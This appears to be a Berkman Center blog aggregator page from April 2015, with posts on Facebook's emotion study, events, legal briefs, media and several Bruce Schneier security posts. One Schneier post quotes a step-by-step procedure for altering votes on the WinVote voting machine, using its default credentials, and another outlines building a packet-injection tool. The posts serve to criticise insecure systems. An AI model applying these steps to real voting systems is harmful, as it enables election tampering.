June 2014 saw a media uproar about Facebook's emotional contagion study, published in the Proceedings of the National Academy of Sciences. In conjunction with researchers at Cornell, Facebook designed an experiment which altered the Facebook News Feed to explore if emotions can spread through Facebook. These feeds, the primary activty and content list on Facebook, are populated according to a proprietary algorithm. In the experiment, the algorithms for a random subset of users were manipulated to display either proportionately more negative emotional content or proportionately more emotional content; a control group saw content according to the current algorithm.

This study met vocal opposition not solely for manipulating the moods of Facebook users, but also because users neither volunteered nor opted in to such research, and were not informed of their participation in the study. This study is a motivating example of the moral, legal, and technical questions raised when algorithms permeate society.


From the Harvard Law case study, co-authored by Jonathan Zittrain,"Algorithmic Allegories (version 1.0)"
About Jonathan | @zittrain

Alison Head interviews Dan Rothstein of the Right Question Institute about learning to ask questions


Imagine students in courses that encourage dialogue, the exchange of ideas, and, yes, metacognition. The act of engaging with others, of seeking different perspectives, of tapping other resources can become part of their modus operandi. If we want to encourage this, we can't expect that it will happen by chance or osmosis. Thousands of students sitting alongside of each other, taking notes, and answering questions, is not the same as students engaged in thinking with their peers. There is a need for a pedagogical vision that deliberately builds a community engaged in intellectual exchange.


From the "Smart Talk" interview,"Dan Rothstein: The necessity of asking questions"
About Alison | About Project Information Literacy

Chris Bavitz explains what's great about the Berkman Center


The Berkman Center occupies a unique position at the intersection of scholarship, business, law, and policy. It is renowned for its convening power and its ability to solicit input from, share information with, and facilitate communications among researchers, companies, government representatives, and public interest advocacy organizations about the subjects of the Center's work....

This confluence of research, teaching, advocacy, and technical development activities in a single institution is unique. That the Center engages in these activities while maintaining such an energetic community - deeply engaged in near-constant dialogue about law and technology business, norms, and policy - is extraordinary.


From his HLS Admissions blog post, Technology, Innovation, and Entrepreneurship at Harvard: Interdisciplinarity and Impact at The Berkman Center for Internet and Society "
About Chris | @cbavitz

Nepal Earthquake: People Around the World Scramble Online to Find Loved Ones


An overwhelmed Nepali government has declared a state of emergency appealing to the international community following a massive 7.8 earthquake, which struck close to noon on April 25, between Nepal's key cities of Kathmandu and Pokhara, resulting in more than 1,800 deaths.

In the midst of this crisis, people are using tools like Google Person Finder and Facebook Safety Check to find loved ones. Google Person Finder launched in 2010 in response to the earthquake in Haiti and helps people find each other in the aftermath of a disaster, by downloading or uploading data from the site.


From Global Voices | @globalvoices

More Berkman in the News

Manage subscription preferences

by gweber at April 27, 2015 07:32 PM

Berkman Center front page
The Arab Networked Public Sphere: Social Mobilization Post-Revolutions


With special guests, Lina Attalah, Rob Faris (moderator), Fares Mabrouk, Dalia Othman and Nagla Rizk


Join us for a round-table discussion on the networked public sphere and social mobilization post-revolutions in the Arab world.

Event Date

Apr 27 2015 5:00pm to Apr 27 2015 6:30pm
Thumbnail Image: 

Monday, April 27, 2015 5:00 pm - 6:30 pm
Harvard Law School campus
Wasserstein Hall, Milstein East C (second floor)

Join us for a round-table discussion on the networked public sphere and social mobilization post-revolutions in the Arab world. Researchers working with Harvard’s Berkman Center for Internet & Society, the American University in Cairo’s Access to Knowledge for Development Center, Innova Tunisia and the Arab Policy Institute will discuss current research conducted on the evolution of the networked public sphere in Egypt and Tunisia.

The networked public sphere has emerged as an influential medium for sharing news, disseminating information, and mediating collective action. Many have pointed to the impact of digital media on politics and public affairs, particularly in promoting and coordinating popular protests. Digitally mediated collective action continues to play a prominent role in the political landscape in Egypt and Tunisia. Nevertheless, rigorous assessments of the networked public sphere’s impact, modalities, and relationship to collective action offline are still rare.

In this session, we will present and discuss research that focuses on tracking and analyzing the socio-political topics in online content and their interplay with offline networks based on fieldwork research in Egypt and Tunisia.

This research is part of a joint effort by the Berkman Center, the American University in Cairo’s Access to Knowledge for Development Center (A2K4D), Innova Tunisia and the Arab Policy Institute.

Lina Attalah is the chief editor of Mada Masr, a Cairo-based news website. She is also a research fellow with the Access to Knowledge for Development Center.

Rob Faris (moderator) is the Research Director of the Berkman Center for Internet and Society at Harvard University.

Fares Mabrouk is the Director of the Arab Policy Institute, a Tunis-based think tank. He also leads Yunus Social Business (YSB) global acceleration programs.

Dalia Othman is a Berkman Fellow and Visiting Scholar at MIT's Center for Civic Media.

Nagla Rizk is a professor of economics and founding director of the Access to Knowledge for Development Center at the American University in Cairo.

Note: Jazem Halioui, CEO of Innova Tunisia and an entrepreneur with eighteen years of experience in bootstrapping and managing companies in Tunisia and France, was originally scheduled to participate, but unfortunately will not be able to attend.

Event Hashtag: #ArabNPS


by candersen at April 27, 2015 01:32 PM

David Weinberger
My losing bingo card

At our daughter’s baby shower — which was awesome — we played Baby Shower Bingo. You fill in a bingo card with items, and if during the opening of the gifts any of those items have been given, you mark it on your card. First with five in a row wins (In this case they won a Toblerone bar.)

Here’s my losing card:

baby shower bingo card

The post My losing bingo card appeared first on Joho the Blog.

by davidw at April 27, 2015 12:00 AM

April 26, 2015

metaLAB (at) Harvard
The ghosts of poets’ voices walk the yard

I’ve long been a fan of Halsey Burgund, a sound artist and musician who works with the human voice in both compositions and place-based installations. So I’ve been excited to work with Halsey these last few weeks, in conjunction with the Woodberry Poetry Room, to develop a locative experience on poetry for Harvard’s upcoming LitFest. The resulting project, re~verse (for iOS devices), is a portal to a participatory, location-based sound installation in which fragments of recorded poetry from Harvard’s collections—the voices of renowned poets—crowd together at the gates of Harvard Yard. Like tourists, students, and the many passers-by who make up the migrant denizens of campus, they cluster at the gates before dispersing, chorusing with music and one another across stanzas and centuries. From gate to gate, they combine with the voices of users of the app, who are invited to contribute to a growing, unfolding work of art with responses, recitations, and reveries.

The app assembles more than a thousand pieces of audio, samples taken from the extraordinary audio archive of poetry readings gathered in the Woodberry collection (see the map below, which shows Halsey’s placement of audio files for the project, and gives a sense of the magnitude of the media in play). And yet Halsey’s app allows this density of archival sound to reach listeners intimately and evocatively, as voices whispering quietly, pacing alongside, inviting them to venture their own reflections.


While re~verse is available globally from the App Store, it ties its sound media ineluctably to site—in this case, to the gates of the Yard—so to experience it fully, you’ll need to install the app on your iOS device, plug in your headphones, and wander Harvard’s Cambridge campus. This is a poetic encounter with place.

This Tuesday night, you can join us in Barker Center’s Thompson Room for the opening celebration of re~verse. During this event, those dynamic and vital voices will fill the Thompson Room in Barker Center as participants immerse themselves in, contribute to, and stand among a growing, unfolding work (or working) of art. We’ll invite participants to install the app or borrow a device to wander across Quincy Street, where the books stand open and the gates unbarred, to chorus with poets.

Get re~verse (for iOS)

by Matthew Battles at April 26, 2015 02:53 PM

Justin Reich
Looking at Class Sets of Work with
Exploring student thinking and problems solving with resources from, one of the gems of the Math TwittoBlogoSphere. #MTBoS

by Justin Reich at April 26, 2015 12:45 AM

April 25, 2015

David Weinberger
Our new plummy acting

I have to say that I’m enjoying our new hammy acting style. But hammy isn’t the right word for it, since it implies a lack of craft. So I’ll call it plummy. (The fact that I’m a kosher vegetarian has nothing to do with this.) Our new plummy actors are fully in control of what they’re doing. They’re on purpose pushing it a little further than realness, knowing that we know that they’re doing so.

Leo Dicaprio in What’s Eating Gilbert Grape? is not hammy or plummy.

Leo in Wolf of Wall Street is plummy.

Had he gone for a Brando-like realism, Wolf would have been as depressing as businesspeople-are-shallow movies like 1959’s What Makes Sammy Run?

Every character in American Horror Story is plummy. Most of the actors on Justified are plummy. Well, the male actors. They get to have way more fun than almost all the women. (The exception: Margo Martindale who played Megs, the Big Bad in 2011. And guess what? She won an Emmy for it.)

Everyone on Fargo, both the TV show and the movie.

Everyone on Veep. which has has gotten ferociously funny this season.

Tony and the Henchmen on The Sopranos. Not so much Carmela or Dr. Melfi, although Nancy Marchand‘s Mom the Destroyer certainly counts.

I’m not sure that Breaking Bad is a great example of this, but Better Call Saul is…again, for the men more than the women, with the exception of Julie Ann Emery‘s Betsy Kettleman.

I’m not saying this is an unprecedented style of acting. In some ways it’s similar to the old days when stars were visible through the roles they played: You could see Cary Grant behind the lines he suavely delivered, and you could see Marilyn Monroe through her bombshell comedienne roles. Or at least you thought you could.

But the current style of acting is different. These actors are as invisible in their roles as Brando’s generation was. But what they’re making of themselves on screen isn’t intended to be mistaken for real life captured by well-placed hidden cameras. They are clearly playing roles. They’re just playing the hell out of them.

So why the men more than the women? As everyone who has watched TV in the past five years has pointed out, the new great series have been dominated by stories of men struggling with their flaws. The women too often are there to “ground” the characters around them. They are often phenomenal actors — Edie Falcon? Get out of town! — but are just not allowed to push beyond the natural. I’m sure it’s all just a coincidence though.


Mad Men isn’t on this list because I think the acting aims for naturalism, perhaps because we already see the distance between the roles people play within their world and who they might be if they were less constrained by the 1950s and 1960s social norms.

The post Our new plummy acting appeared first on Joho the Blog.

by davidw at April 25, 2015 08:39 PM

April 24, 2015

Bruce Schneier
Friday Squid Blogging: The Unique Reproductive Habits of the Vampire Squid


While most female squid and octopuses have just one reproductive cycle before they die, vampire squid go through dozens of egg-making cycles in their lifetimes, scientists have found.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

by Bruce Schneier at April 24, 2015 09:43 PM

Cyberlaw Clinic - blog
Clinic Files Amicus Brief in Mass SJC on Location Privacy

coverThe Cyberlaw Clinic filed an amicus brief (PDF) this week in the Supreme Judicial Court of Massachusetts on behalf of the American Civil Liberties Union of Massachusetts (ACLUM) and the Electronic Frontier Foundation (EFF) in Commonwealth v. Estabrook, SJC–11833. The case concerns location privacy and cell phone technology — specifically, whether law enforcement can gather a large amount of cell phone location information if it only plans to use a small fraction of that information in a prosecution. This is the third brief the Clinic has filed on location privacy issues in Massachusetts, including briefs for EFF in Commonwealth v. Augustine and Commonwealth v. Rousseau in 2013.

Cellular service providers must know where their subscribers are at any given time to provide them with service. Providers therefore collect vast quantities of location information, tracking the movements of customers wherever they go. Last year, in Augustine, 467 Mass. 230 (2014), the Supreme Judicial Court ruled that, in general, the police must get a search warrant to obtain location information from a cellular service provider. The ruling left open the possibility, however, that the police might be able to obtain a “brief period” of location information without a warrant but, instead, with a court order that is considerably easier to obtain.

This latest brief argues that Augustine requires police to get a warrant to obtain location information even if they only plan to use a small amount. It urges the SJC to establish a blanket warrant requirement that applies whenever police seek cellphone location data. As the brief notes, considering the growing volume and accuracy of such data, and the confusion that the Augustine exception has created in the lower courts, a blanket warrant requirement would provide much-needed clarity to police, prosecutors, and the public. Such a rule would align Massachusetts with the dozen other states that have imposed blanket warrant requirements for cellphone location data, without any apparent ill effects on the ability of the police to investigate crimes.

The case is scheduled for argument on Thursday, May 7th, at the John Adams Courthouse in Boston. Special thanks go to HLS Cyberlaw Clinic students Abigail Colella (’16), Sandra Hanian (’15), and Travis West (’16), who worked closely with Vivek Krishnamurthy, Andy Sellars, and the amici, to prepare and file the brief.

by Clinic Staff at April 24, 2015 07:40 PM

Bruce Schneier
Signed Copies of Data and Goliath

You can now order signed copies of Data and Goliath from my website.

by Bruce Schneier at April 24, 2015 07:12 PM

The Further Democratization of QUANTUM

From my book Data and Goliath:

...when I was working with the Guardian on the Snowden documents, the one top-secret program the NSA desperately did not want us to expose was QUANTUM. This is the NSA's program for what is called packet injection­ -- basically, a technology that allows the agency to hack into computers. Turns out, though, that the NSA was not alone in its use of this technology. The Chinese government uses packet injection to attack computers. The cyberweapons manufacturer Hacking Team sells packet injection technology to any government willing to pay for it. Criminals use it. And there are hacker tools that give the capability to individuals as well. All of these existed before I wrote about QUANTUM. By using its knowledge to attack others rather than to build up the Internet's defenses, the NSA has worked to ensure that anyone can use packet injection to hack into computers.

And that's true. China's Great Cannon uses QUANTUM. The ability to inject packets into the backbone is a powerful attack technology, and one that is increasingly being used by different attackers.

I continued:

Even when technologies are developed inside the NSA, they don't remain exclusive for long. Today's top-secret programs become tomorrow's PhD theses and the next day's hacker tools.

I could have continued with "and the next day's homework assignment," because Michalis Polychronakis at Stony Book University has just assigned building a rudimentary QUANTUM tool as a homework assignment. It's basically sniff, regexp match, swap sip/sport/dip/dport/syn/ack, set ack and push flags, and add the payload to create the malicious reply. Shouldn't take more than a few hours to get it working. Of course, it would take a lot more to make it as sophisticated and robust as what the NSA and China have at their disposal, but the moral is that the tool is now in the hands of anyone who wants it. We need to make the Internet secure against this kind of attack instead of pretending that only the "good guys" can use it effectively.

End-to-end encryption is the solution. Nicholas Weaver wrote:

The only self defense from all of the above is universal encryption. Universal encryption is difficult and expensive, but unfortunately necessary.

Encryption doesn't just keep our traffic safe from eavesdroppers, it protects us from attack. DNSSEC validation protects DNS from tampering, while SSL armors both email and web traffic.

There are many engineering and logistic difficulties involved in encrypting all traffic on the internet, but its one we must overcome if we are to defend ourselves from the entities that have weaponized the backbone.


And this is true in general. We have one network in the world today. Either we build our communications infrastructure for surveillance, or we build it for security. Either everyone gets to spy, or no one gets to spy. That's our choice, with the Internet, with cell phone networks, with everything.

by Bruce Schneier at April 24, 2015 05:50 PM

Federal Trade Commissioner Julie Brill on Obscurity

I think this is good:

Obscurity means that personal information isn't readily available to just anyone. It doesn't mean that information is wiped out or even locked up; rather, it means that some combination of factors makes certain types of information relatively hard to find.

Obscurity has always been an important component of privacy. It is a helpful concept because it encapsulates how a broad range of social, economic, and technological changes affects norms and consumer expectations.

by Bruce Schneier at April 24, 2015 05:42 PM

Kate Krontiris
The Durham Residency This summer will see the launch of the...

The Durham Residency 

This summer will see the launch of the inaugural Durham Residency, a DIY week-long facilitated workshop for 6 creatives to develop individual projects, in a collaborative environment.

The experience will include individual working time, group feedback sessions, a final demo day, eating, playing, exploring the outdoors, and whatever else feeds inspiration and progress.

Please apply to the residency here.

What you bring:

A project to work on
The ability to make 1-2 meals for the group
A willingness to offer daily feedback to colleagues
A spirit of adventure and experimentation

What you get:

A beautiful place to work, lodge, and play for the week
A facilitated structure for individual work and collaborative feedback
All meals
Roundtrip transportation from Boston


$550 covers lodging, all meals, and a facilitated experience for the week.
We will be staying in a beautiful farmhouse in the Hudson Valley, NY.  

Who should apply?

We strongly encourage people from diverse backgrounds to apply.  Creativity comes in many different sizes, shapes, colors, experiences, and imaginations.  If you have a project and want to work on it seriously in the company of others, then this residency is for you.  Scholarship requests will be considered on an as-needed basis.

A flyer about the Durham Residency is available here.

You may apply to the residency here.

Applications are due by June 1, 2015.

April 24, 2015 04:24 PM

Willow Brugh
Humanitarian Technology Festival

I came on with Aspiration back in January as the Community Leadership Strategist, to merge the work I’ve been doing in the humanitarian and disaster response space with Aspiration’s practices and team. It’s been a *blast* so far, and continues to be.

Most of the work I’ve done in the last 5 years has been about what social justice looks like when we’re doing response, with a focus on technology (as that opens up paths to conversations we otherwise quit having). With Geeks Without Bounds, we did hackathons all over the world, including Random Hacks of Kindness and SpaceApps Challenge. I’ve been a coordinator for the Digital Humanitarian Network, keynoted the IEEE Global Humanitarian Technology Conference, was invited to the White House to talk about Sandy response, facilitated the first hackathon IN (not just for) Haiti, etc etc etc. I’ve also had a huge organizational crush on Aspiration since my first DevSummit in 2013, attending as many Aspiration-connected events as possible. When I was able to join Team Aspiration, I was overjoyed — even while much of the work I’ve continued to do on response had already existed, it’s been a slow shift to get those previously-defined objects to be a bit more Aspiraiton-shaped.

The Humanitarian Technology Festival in Cambridge May 9+10 is the first event that is both committed to response and framed on Aspiration ethos. I am SO EXCITED about this it hurts. Let me explain why.

The very way we deliver aid perpetuates the need for more aid, both for fast- and slow-onset disasters (or “extreme events” or “humanitarian issues” or “earthquake” or “famines” or whatever you’d like to say). When people need lodging after a hurricane, they’re either told to evacuate and/or they’re put into temporary homes, away from neighbors and family. There is little impetus to return and rebuild both social and tangible structures. People are uprooted, and must start from scratch. When, instead, we see that people don’t just need lodging but in fact need social fabric, responders (and the technologies used for response) can focus on how to maintain family and neighborhood ties. People are then less stressed as well as being more likely to take their own actions to return and rebuild.

For humanitarian aid, this is even more paternalistic and stratifying… while not actually “fixing” any of the things it aims to. Aid is primarily about making the giver feel better. But like Tom’s Shoes picking up on the “buy one, give one” idea that OLPC actually handled with cultural grace and systems thinking, instead Tom’s put some people out of work while trying to provide something THEY thought others needed. Even if it had been delivered in a less-jerky way, aid often ends up with locations dependant on that aid, rather than internally strengthened. This is one way we keep extracting resources out of other places without actually contributing to those locations. See also this bit of the paper I’m still working on. This allows the worst parts of globalization (erasure of cultures, consolodation of wealth, etc) to continue.

Some might say “fine, let them fend for themselves,” but that’s not ok either. When we don’t have to look at our neighbors (when we build walled housing complexes, or segregated schools), we can ignore how bad things are for them. And that’s also not an acceptable answer.

What we need are ways to listen to what people can offer, and what they need, under the assumptions that we are equals. This is why I’m so excited to see how the participatory methods I associate so strongly with Aspiration come to bear on this space. Just do a search-and-replace for “Nonprofits” to “Affected Communities” on our Manifesto and Participant Guidelines. People in these fragile situations are NOT a population to playtest new tools. Not only do failures have a larger impact in these spaces, but to think of another location and its people as “demo” space is undignified and unjust. We need better ways (not just better tools) for life EVERYWHERE, and to assume that we WEIRD (Western Educated Industrialized Rich Democratic)-o’s have all the answers is downright arrogant. By instead, as we do at Aspiration events, speaking to each other in easy-to-understand language, under the assumption that everyone is bringing something meaningful to the table, and that together we’ll figure it out; we can shift not only how we do response, but the after-effects of that response.

I’m especially excited to speak to people about distributed response, and how the tools we build for ourselves can be welcoming to others using as well. Check out NYCprepared and Taarifa to see what this can look like.

by bl00 at April 24, 2015 01:17 PM

April 23, 2015

Bruce Schneier
An Incredibly Insecure Voting Machine


The weak passwords -- which are hard-coded and can't be changed -- were only one item on a long list of critical defects uncovered by the review. The Wi-Fi network the machines use is encrypted with wired equivalent privacy, an algorithm so weak that it takes as little as 10 minutes for attackers to break a network's encryption key. The shortcomings of WEP have been so well-known that it was banished in 2004 by the IEEE, the world's largest association of technical professionals. What's more, the WINVote runs a version of Windows XP Embedded that hasn't received a security patch since 2004, making it vulnerable to scores of known exploits that completely hijack the underlying machine. Making matters worse, the machine uses no firewall and exposes several important Internet ports.

It's the AVS WinVote touchscreen Direct Recording Electronic (DRE). The Virginia Information Technology Agency (VITA) investigated the machine, and found that you could hack this machine from across the street with a smart phone:

So how would someone use these vulnerabilities to change an election?

  1. Take your laptop to a polling place, and sit outside in the parking lot.
  2. Use a free sniffer to capture the traffic, and use that to figure out the WEP password (which VITA did for us).
  3. Connect to the voting machine over WiFi.
  4. If asked for a password, the administrator password is "admin" (VITA provided that).
  5. Download the Microsoft Access database using Windows Explorer.
  6. Use a free tool to extract the hardwired key ("shoup"), which VITA also did for us.
  7. Use Microsoft Access to add, delete, or change any of the votes in the database.
  8. Upload the modified copy of the Microsoft Access database back to the voting machine.
  9. Wait for the election results to be published.

Note that none of the above steps, with the possible exception of figuring out the WEP password, require any technical expertise. In fact, they're pretty much things that the average office worker does on a daily basis.


by Bruce Schneier at April 23, 2015 12:19 PM

April 22, 2015

Ivan Sigal
KCR Screening at the Fogg Museum
Sample of KCR multichannel installation

Sample of KCR multichannel installation

KCR appeared at Harvard’s Fogg Museum as a nine-channel interactive on April 20, 2015. It featured in the Lightbox Gallery, a space dedicated to digital installations in the new, Renzo Piano-designed addition to the museum. The installation was built in the programming language Processing, an open source project built to manage interactivity, nonlinearity, and graphic design. Coding help from Sands Fish and editing assistance from Robin Bell. Following is a sample clip of the installation:

Fogg Museum description: KCR, a documentary and installation project by Ivan Sigal, a fellow at Harvard’s Berkman Center for Internet & Society, traces the path of the defunct Karachi Circular Railway in Karachi, Pakistan, through a spatialized archive of video, stills, text, and drone aerial footage. Visitors will be able to talk with Sigal and learn more about digital collections and collections data.

by Ivan Sigal at April 22, 2015 07:08 PM

Bruce Schneier
Counting the US Intelligence Community Leakers

It's getting hard to keep track of the US intelligence community leakers without a scorecard. So here's my attempt:

  • Leaker #1: Chelsea Manning.

  • Leaker #2: Edward Snowden.

  • Leaker #3: The person who leaked secret documents to Jake Appelbaum, Laura Poitras, and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. This might be the "high-ranking NSA employee in Germany" from this story -- or maybe that's someone else entirely.

  • Leaker #4: "A source in the intelligence community," according to the Intercept, who leaked information about the Terrorist Screening Database, the "second leaker" from the movie Citizen Four. Greenwald promises a lot from him: "Snowden, at a meeting with Greenwald in Moscow, expresses surprise at the level of information apparently coming from this new source. Greenwald, fearing he will be overheard, writes the details on scraps of paper." We have seen nothing since, though. This is probably the leaker the FBI identified, although we have heard nothing further about that, either.

  • Leaker #5: Someone who is leaking CIA documents.

  • Leaker #6: The person who leaked secret information about WTO spying to the Intercept and the New Zealand Herald. This isn't Snowden; the Intercept is very careful to identify him as the source when it writes about the documents he provided. Neither publication give any indication of how it was obtained. This might be Leaker #3, since it contains X-KEYSCORE rules.

  • Leaker #7: The person who just leaked secret information about the US drone program to the Intercept and Der Spiegel. This also might be Leaker #3, since there is a Germany connection. According to the Intercept: "The slides were provided by a source with knowledge of the U.S. government's drone program who declined to be identified because of fears of retribution." That implies someone new.

Am I missing anyone?

Harvard Law School professor Yochai Benkler has written an excellent law review article on the need for a whistleblower defense. And there's this excellent article by David Pozen on why government leaks are, in general, a good thing. I wrote about the value of whistleblowers in Data and Goliath.

Way back in June 2013, Glenn Greenwald said that "courage is contagious." He seems to be correct.

This post was originally published on the Lawfare blog.

EDITED TO ADD (4/22): News article.

In retrospect, I shouldn't have included Manning in this list. I wanted it to be a list of active leaks, not historical leaks. And while Snowden is no longer leaking information, the reporters who received his documents are still releasing bits and pieces.

by Bruce Schneier at April 22, 2015 05:59 PM

Cyberlaw Clinic - blog
Clinic Files Amicus Brief on Free Speech Issue in Massachusetts

lucas briefOn Tuesday, the Cyberlaw Clinic filed an amicus brief (PDF) in the Supreme Judicial Court of Massachusetts on behalf of the New England First Amendment Coalition, Boston Globe Media Partners, LLC (owners of the Boston Globe), Hearst Television, Inc. (owners of WCVB-TV Channel 5 in Boston), the Massachusetts Newspaper Publishers Association, the New England Newspaper and Press Association, Inc., and the New England Society of Newspaper Editors in Commonwealth v. Lucas, SJC-11830. The case was brought under the Massachusetts false campaign speech law, M.G.L. ch. 56 § 42 (“Section 42″). The defendant in the case, a treasurer with a political action committee that sent a mailer in the 2014 state election, challenged the constitutionality of the statute under the First Amendment and Article 16 of the Massachusetts Declaration of Rights.

The brief argues that Section 42 is an unconstitutional restriction on the content of speech, and is also unconstitutionally vague. The brief describes the robust protection for speech in the realm of political debate, and notes several cases in other jurisdictions where courts struck false campaign speech statutes. As those cases note, counterspeech by political opponents is the preferred way to remedy misleading political speech, and statutes that criminalize false speech for the sake of protecting listeners are usually instead used as tools to extract partisan revenge by filing frivolous criminal complaints.

As the brief notes, Section 42 presents more serious concerns than the statutes in those cases, as it criminalizes the making or publishing of “any false statement in relation to any candidate for nomination or election to public office, which is designed or tends to aid or to injure or defeat such candidate.” Thus, Section 42, “potentially ascribes liability to publishers of third-party information, even when the public well understands that they are not the originators of that speech.” The statute could also criminalize statements that are technically false but are not misleading or fraudulent, including rhetorical hyperbole, satire, false statements published in the process of debunking them, or statements made in covering both sides of a controversial story.

The case is scheduled for argument on Thursday, May 7th, at the John Adams Courthouse in Boston. Special thanks to HLS Cyberlaw Clinic students Catherine Essig (’16), Naomi Gilens (’16), and D. Patrick Knoth (’16), who worked closely with Andy Sellars and Chris Bavitz, along with amici, to prepare and file the brief.

by Clinic Staff at April 22, 2015 03:08 PM

Bruce Schneier
Hacker Detained by FBI after Tweeting about Airplane Software Vulnerabilities

This is troubling:

Chris Roberts was detained by FBI agents on Wednesday as he was deplaning his United flight, which had just flown from Denver to Syracuse, New York. While on board the flight, he tweeted a joke about taking control of the plane's engine-indicating and crew-alerting system, which provides flight crews with information in real-time about an aircraft's functions, including temperatures of various equipment, fuel flow and quantity, and oil pressure. In the tweet, Roberts jested: "Find myself on a 737/800, lets see Box-IFE-ICE-SATCOM, ? Shall we start playing with EICAS messages? 'PASS OXYGEN ON' Anyone ? :)" FBI agents questioned Roberts for four hours and confiscated his iPad, MacBook Pro, and storage devices.

Yes, the real issue here is the chilling effects on security research. Security researchers who point out security flaws is a good thing, and should be encouraged.

But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There's some serious surveillance going on.

Now, it is possible that Roberts was being specifically monitored. He is already known as a security researcher who is working on avionics hacking. But still...

Slashdot thread. Hacker News thread.

EDITED TO ADD (4/22): Another article, this one about the debate over disclosing security vulnerabilities.

by Bruce Schneier at April 22, 2015 01:51 PM

"Hinky" in Action

In Beyond Fear I wrote about trained officials recognizing "hinky" and how it differs from profiling:

Ressam had to clear customs before boarding the ferry. He had fake ID, in the name of Benni Antoine Noris, and the computer cleared him based on this ID. He was allowed to go through after a routine check of his car's trunk, even though he was wanted by the Canadian police. On the other side of the Strait of Juan de Fuca, at Port Angeles, Washington, Ressam was approached by U.S. customs agent Diana Dean, who asked some routine questions and then decided that he looked suspicious. He was fidgeting, sweaty, and jittery. He avoided eye contact. In Dean's own words, he was acting "hinky." More questioning -- there was no one else crossing the border, so two other agents got involved -- and more hinky behavior. Ressam's car was eventually searched, and he was finally discovered and captured. It wasn't any one thing that tipped Dean off; it was everything encompassed in the slang term "hinky." But the system worked. The reason there wasn't a bombing at LAX around Christmas in 1999 was because a knowledgeable person was in charge of security and paying attention.

I wrote about this again in 2007:

The key difference is expertise. People trained to be alert for something hinky will do much better than any profiler, but people who have no idea what to look for will do no better than random.

Here's another story from last year:

On April 28, 2014, Yusuf showed up alone at the Minneapolis Passport Agency and applied for an expedited passport. He wanted to go "sightseeing" in Istanbul, where he was planning to meet someone he recently connected with on Facebook, he allegedly told the passport specialist.

"It's a guy, just a friend,"he told the specialist, according to court documents.

But when the specialist pressed him for more information about his "friend" in Istanbul and his plans while there, Yusuf couldn't offer any details, the documents allege.

"[He] became visibly nervous, more soft-spoken, and began to avoid eye contact," the documents say. "Yusuf did not appear excited or happy to be traveling to Turkey for vacation."

In fact, the passport specialist "found his interaction with Yusuf so unusual that he contacted his supervisor who, in turn, alerted the FBI to Yusuf's travel," according to the court documents.

This is what works. Not profiling. Not bulk surveillance. Not defending against any particular tactics or targets. In the end, this is what keeps us safe.

by Bruce Schneier at April 22, 2015 01:40 PM

David Weinberger

I registered to keep it out of the hands of those who do not support her. For $13, why not?

I suppose I should have registered just for the sake of symmetry.

The post appeared first on Joho the Blog.

by davidw at April 22, 2015 12:31 PM

Ethan Zuckerman
Introducing FOLD, a new tool (and a new model?) for storytelling

This morning, Center for Civic Media at MIT is releasing a new publishing platform, FOLD. Alexis Hope (a Masters student in my lab) and Kevin Hu began working on FOLD when they were students in my class News and Participatory Media. The class asks students to take on a reporting task each week, using existing tools or building new ones to solve a particular challenge. FOLD was Alexis and Kevin’s solution to a challenge I put forward around writing “explainers”, articles designed to provide content for stories that give incremental updates to a larger story (and to develop an appetite for those stories based on deeper understanding of their significance.)

Alexis and Kevin took seriously an idea I put forward in the class – the idea of explainers with an accordion structure, capable of shrinking or expanding to meet a reader’s need for background information. Alexis and Kevin built a story that could compress into a list of half a dozen sentences, inflate to a six-paragraph essay, or expand further into a rich multimedia essay with maps, images and videos appearing alongside the text. The class loved the idea, and Alexis decided to take on developing the platform as her Masters thesis. Kevin continued collaborating with her while pursuing a different project for his thesis, and Joe Goldbeck joined the team as a lead developer.

FOLD Authoring preview from Alexis Hope on Vimeo.

What’s emerged after a year’s work is fascinating and full-featured tool that allows for a novel method of storytelling. Stories on FOLD have a trunk and leaves. The trunk is text, with a novel form of hyperlinks – instead of linking out, they link to cards that appear to the right of the trunk and show images, videos, maps, data visualizations. They can also contain other text or links to the web. This has the effect of encouraging massive linking within stories – rather than a link potentially leading someone away from your webpage, it builds a stronger and richer story on the site.

While I’ve had the pleasure of advising Alexis on her thesis, FOLD is emphatically not my project – had you asked me a year ago, I would have told you that the last thing the world needs is a new content management system. But it’s been fascinating to try writing on FOLD and discovering the ways in which it’s a tool I’ve wanted and needed for years. I often write posts with hyperlinks every other sentence and trust my readers to check those links to understand the whole story… while realizing, of course, that very few do. FOLD brings those references to the front, capturing some of your attention in your peripheral visionas you read the core, trunk text. It’s incredibly easy to add media to a story in FOLD, and I find that when I write on the platform, I’m far more likely to include rich imagery and video, which makes my stories visualizable and understandable in a very different way than blog posts.

Screen Shot 2015-04-21 at 1.11.58 PM

Alexis, Kevin and Joe are launching FOLD without a clear business model. I think that’s a good thing. I don’t think we know what FOLD is good for yet, and I think that’s exciting. It’s possible that FOLD becomes an alternative to platforms like Medium, a place that encourages people to write beautifully on a beautiful platform. Perhaps it becomes something like WordPress, which hosts content for millions of people as well as maintaining an incredibly robust platform for independent publishers. (Not only are we releasing FOLD as a platform, but as an open source codebase.) Maybe it’s a tool for a radically new form of writing, perhaps stronger for literary than journalistic writing. Maybe some of the ideas of the platform are adopted into other systems and the influence of Alexis, Kevin and Joe’s thinking spreads that way. We don’t know, and that’s exciting.

For me, personally, I’ve loved the experience of seeing something cool and potentially influential coming out of our lab that wasn’t my idea and which I’ve helped guide, but emphatically haven’t built. This feels like a shift in how I’m trying to work in the world, and one I’m starting to get comfortable with.

Like many people of my generation, I’ve changed jobs several times in the past twenty years. Rather than switching firms, I’ve also shifted careers, moving from a dotcom startup to founding an international volunteering agency, to academic research (and co-founding another NGO) and finally, at age 39, to teaching at the graduate level at MIT.

When you change careers, some skills transfer, and some don’t. The shift from research to teaching was far sharper than I’d expected. There’s an unkind saying, “Those who can’t do, teach.” I’d offer a rewrite: “Teaching well forces you to stop doing things, and focus on helping others do things.” I build less, and write less, than before I came to MIT. But I coach more, listen more, and I’m starting to love the experience of watching projects I help advise coming to life.

Glyph from Savannah Niles’s story about Cuba

